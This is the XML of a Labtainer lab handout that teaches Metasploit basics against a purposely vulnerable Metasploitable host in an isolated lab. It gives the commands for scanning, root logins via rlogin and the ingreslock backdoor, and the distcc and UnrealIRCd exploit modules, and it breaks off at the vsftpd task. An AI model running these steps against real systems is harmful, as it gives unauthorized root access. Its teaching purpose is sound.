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Metasploit Lab Exercise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>222885</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>127000</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5567045" cy="525145"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name="Shape1"/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5566320" cy="524520"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:style>
                        <a:lnRef idx="0"/>
                        <a:fillRef idx="0"/>
                        <a:effectRef idx="0"/>
                        <a:fontRef idx="minor"/>
                      </wps:style>
                      <wps:txb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17.55pt;margin-top:10pt;width:438.25pt;height:41.25pt">
                <w10:wrap type="square"/>
                <v:fill o:detectmouseclick="t" on="false"/>
                <v:stroke color="black" joinstyle="round" endcap="flat"/>
                <v:textbo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pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This Labtainer exercise explores the use of the metasploit tool which is installed on a Kali Linux system (attacker) and is meant  to learn simple penetration skills on a purposely vulnerable metasploitable host (victim).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Note: the attacker computer is configured to have IP address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>192.168.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> while the victim computer is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>192.168.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Performing the lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The lab is started from the Labtainer working directory on your Linux host, e.g., a Linux VM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>From there, issue the command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>labtainer metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The resulting virtual terminal is connected to the attacker computer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Tasks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Verify connectivity between attacker and victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>A simple ping from the attacker system will be sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:tab/>
        <w:t>ping 192.168.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Get a list of vulnerable services on the victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>An 'nmap' scan of the victim will be sufficient.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:tab/>
        <w:t>nmap -p0-65535 192.168.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3. V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ulnerably configured rlogin service (port 513)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Remote login to the victim (with root privilege)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>rlogin -l root 192.168.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Display a 'root' file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>cat /root/filetoview.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vulnerable ingreslock service (port 1524)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Use telnet to access ingreslock service and obtain root privilege</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>telnet 192.168.1.2 1524</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Display root file as above</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vulnerable distccd service (port 3632)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Start Metasploit console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>sudo msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Note you will see a warning about a missing database, you can ignore that.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>search for distccd exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>search distccd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Use the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:tab/>
        <w:t>use exploit/unix/misc/distcc_exec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>View options related to exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>options</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Set the 'RHOST' option</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>set RHOST 192.168.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:tab/>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Note: when the exploit has succeeded, no prompt is shown but a shell is created</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Display the root file as above</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vulnerable IRC daemon (port 6667)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Search for unreal_ircd exploit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:tab/>
        <w:t>search unreal_ircd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Use the exploit;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:tab/>
        <w:t>use exploit/unix/irc/unreal_ircd_3281_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>View and set options as necessary (RHOST option) run the exploit and display root file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vulnerable VSFtpd service (port 21)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Search for vsftpd_234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>search vsftpd_234</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Use the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
